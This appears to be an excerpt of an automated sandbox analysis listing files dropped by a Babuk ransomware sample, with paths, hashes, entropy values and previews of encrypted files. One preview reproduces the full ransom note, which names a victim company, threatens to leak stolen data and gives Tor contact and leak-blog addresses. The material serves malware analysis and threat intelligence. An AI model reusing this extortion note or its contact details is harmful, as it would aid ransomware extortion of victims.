                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.505811750118724
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlV5N0FEX7gToREBrsYVdXyFiBPvPJEvzIg+8Lxl/cNLUxNvEEn:SFEU3LdLBXRaxl0NL0vtn
                                                                            MD5:29E20E399D58F3A2172CE7CEBA6501E2
                                                                            SHA1:0E39D8657C194FFC43619D92A0F55E3429531E8C
                                                                            SHA-256:07B26A0BCF3D83B0B4A47FFF648EFC354B8DE25DD1BB2043715122B04EE24C66
                                                                            SHA-512:66D660D4F6F568D56DF931F047CF3DC29CC5DEB3A27AE4273942E7B4DC3C856E4F2415DA434CC5629E4CE2EB1DA094F562AC0E48EC93337AEEF5E22008DEC088
                                                                            Malicious:false
                                                                            Preview: .....L...}..\..`ls..\p...>..../.|.l/W.T4.(T....W..%.u...JOL.lh.;..l.^.I.px...3%}...Y_k.$7Z..._+...!E%E.Zfa.V................%...~....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.979557814227911
                                                                            Encrypted:false
                                                                            SSDEEP:192:26W9dFuMfhpugTN8fYY3LZtlB9h0NvNEX+8j06ju:LkTuMf7mfr7P+1S/ju
                                                                            MD5:FDCEEACAA5777393B2551355303FABB7
                                                                            SHA1:0C17CC0D16DF86504E39B2C201A21A744959FEBE
                                                                            SHA-256:B27C4DDC4F776F521329AAA90182BB4120442226BAE25FB1719C2D865FDFE788
                                                                            SHA-512:E35DE8122D9F48D0DD8F11EF3E823B29ED7CB3A997A044BE3B53E9ACBECABA94808D5582C8C40B0990E82C642F369DCD8ACF13F3B81C62A54F5AFC9FF69D7E13
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.549669283179742
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlP4Sse9lBfGOL9sMZ8UiyeK8ZigV+gxEn98UY8wgXZp6TW4o7aKcDT/c9UxNvEE:A2hOOJs3ye4Q2987gn4W4maHX/c90vtn
                                                                            MD5:D3852AA6E0EC1E38DDD963D95FAB9552
                                                                            SHA1:05D3AAF10709412E38A41EB686F81200B50A5E2B
                                                                            SHA-256:C3816654F0D27A13FC265C78560790D38CC1172326B8C67065652FE82E22F984
                                                                            SHA-512:506C0EFDC8047D6CA35EAB87A80A29EECFC414EF362C0CF980FAB6712433808064B8D2039CA7FBC32230D65A5BDF927B1C2B5F4A7141ACC374638ED533E345F4
                                                                            Malicious:false
                                                                            Preview: ......).@.N}..%.....l....A..7F.X.a)....r..1Q.^W{c..cl.A....t.A3B.....p1...0e....N..._}.......X.q=Wh[OU...^r|L_....t...k9..Ff........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\BQR--Mi6Hdug9aUgfjMzORag63E.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):15771
                                                                            Entropy (8bit):5.09526529579509
                                                                            Encrypted:false
                                                                            SSDEEP:192:J/MS4lVzgNo0Hb0FAuV++JmzlqZ6GLIV87GI9BgJSY6+lzmu2Bp2aQbwyPcvsyDQ:V4mo07kV7JZ6GLIK7GfVp2Hpykvswb8
                                                                            MD5:E515E69B21C49A355D5D4B91764ABE00
                                                                            SHA1:7571F85095E21BA061631D8A38D18623BCABF301
                                                                            SHA-256:365F8B7A23865CA36D1C1F7A25553AFDDB6223FF524B56D4BEB80FDD98C8E057
                                                                            SHA-512:AA38791CE4ED4039A6D63CF6273BE8CA0DDE2436B8C6E0451937A85652D1C6EA22F38DA9FD81BA9A4E877861B507603C88CACBBFFE4E6B30EC602396F2B87A81
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\I-iaeF2_hBWL-N4uY_JLxrlxDpc.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6584
                                                                            Entropy (8bit):5.431678053520003
                                                                            Encrypted:false
                                                                            SSDEEP:192:wESNgDI0VOD4uejPhA/c5jlTULbhCtE+h:fnb9ThtEe
                                                                            MD5:BD7AE7C3176D8081B60F1107A59E2E0A
                                                                            SHA1:0DA7BD177B96AF58FDE9C890671BD488C2E2436D
                                                                            SHA-256:69A4F680A4A443E28D84769ABBBCDC1A64F24117E2B477B49DF0E6CFD5A83FCC
                                                                            SHA-512:0145288AB1C74C45790C7ABCA7B0AA6A0E8C09AB05FC5B9A0AB858BE1B6E302F043EE5DA81C57158BE48A1700D63E9567C8D5DD56ED021508622F81A1D99D168
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\OxkR0u1OdBld0ezo_UGFraNq4kc.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):258192
                                                                            Entropy (8bit):5.36689739714049
                                                                            Encrypted:false
                                                                            SSDEEP:6144:xi4SvY90SnG9Fau5P9x8x/LrfkoKlU0/dUwKsUIPA:kZFauR0h0i
                                                                            MD5:24FFADCE7C2C668C4B64C2B6F6889DD8
                                                                            SHA1:93D252DF6A0CF542BFC177827EC0C93A3E9B74BF
                                                                            SHA-256:D11B6AFABEBD33DD82FBDAD46D5709D2D05EB5252AB9CE327276A6E77D1088CF
                                                                            SHA-512:DBE37572F9EAC7C06FA5864112E697B715447937D17909A57640FA72094D083816008535704B53895E92E024A5C44BD81F0F1CDDE7E6646B5E369CC1870D9FC5
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\TJkyBfZhNVw9l2HAW3TbsZKbNwc.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):17560
                                                                            Entropy (8bit):5.4266165365013235
                                                                            Encrypted:false
                                                                            SSDEEP:384:iTKwROpIbfMP+t4JdQFBfMlArU/HW8o/Z0Co/lo1LqEzubSfpj:wKwnfMP+EdQFBfMiA/2jR0n6wuj
                                                                            MD5:C8BE2C675D49A0D03AB4965A3AD5E9EF
                                                                            SHA1:500ADA3E4B4A975D296D2049D53BBE7095F6FA77
                                                                            SHA-256:DEBEDE07EF020FEFCA20294F5C16FA8D5FCDEC4DE0355BCA446F3B93D219B687
                                                                            SHA-512:F7BBC3C6C35554193A292BA32E52E740F35D286E63C0805E5C8BCEDA84399D3D7081531CFF407D31B050DBB454571E0A3752A18863E311B18841209F30986517
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\2TKR1XSW\jz5JHWe_2WCod7u1RNWmByRezL4.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8204
                                                                            Entropy (8bit):5.24502306901906
                                                                            Encrypted:false
                                                                            SSDEEP:192:jTceevz/oCfPJQhDEWaMLccp+pZNpPpGIp6/rktQeH+t0B6LB+T1k:jTceevzlrDkmVRn6jk2OB6V+T1k
                                                                            MD5:E9E0F2C7D9FF4E7BA872A004593454B5
                                                                            SHA1:2DB69A5F85D5AFD2C523F8F6B8867EAA4E1125F9
                                                                            SHA-256:24D847FBF4FD59BE3529FDFA7542FD3FE9512662927DD482E60D11344175E778
                                                                            SHA-512:F01AC1FED499AAB6465F3F1FEA96B5036043C260DD8A9029046895768794503264A98E41CC306F54557EAC74C228AF9A65A1E6CBDCFE6B4E0E8BBBD730F6A6A5
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\41Ctwd2X9VNGNHVpdti2vTFozWw.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3280
                                                                            Entropy (8bit):5.029628776196898
                                                                            Encrypted:false
                                                                            SSDEEP:48:uj4b+YGus4lTtA5j4b+YGuqVADSRR4J1UjQkWWWtJt0RE5hTL4JXhXjMpXvXVk:UJms4lGhJmquDevWgggh45/Vk
                                                                            MD5:65237D68849782412963C9B1A1DA22E5
                                                                            SHA1:3490F341E17FEAA7FB56D942539C24C5FA54A30A
                                                                            SHA-256:4B950875FDE265B75753C2A8BEC4588476A323036B38B360A3EDD2A22A106B49
                                                                            SHA-512:FB18BFB43AF2BC6BFFE020AF039D7BCD74B7CE1823D62026F6B5F231E51E024240E2F8B6399716DDFED2EDDECA6302B43D982256ADE02026AA0A6052C35085DF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6
                                                                            Entropy (8bit):2.584962500721156
                                                                            Encrypted:false
                                                                            SSDEEP:3:jUYn:jBn
                                                                            MD5:77373397A17BD1987DFCA2E68D022ECF
                                                                            SHA1:1294758879506EFF3A54AAC8D2B59DF17B831978
                                                                            SHA-256:A319AF2E953E7AFDA681B85A62F629A5C37344AF47D2FCD23AB45E1D99497F13
                                                                            SHA-512:A177F5C25182C62211891786A8F78B2A1CAEC078C512FC39600809C22B41477C1E8B7A3CF90C88BBBE6869EA5411DD1343CAD9A23C6CE1502C439A6D1779EA1B
                                                                            Malicious:false
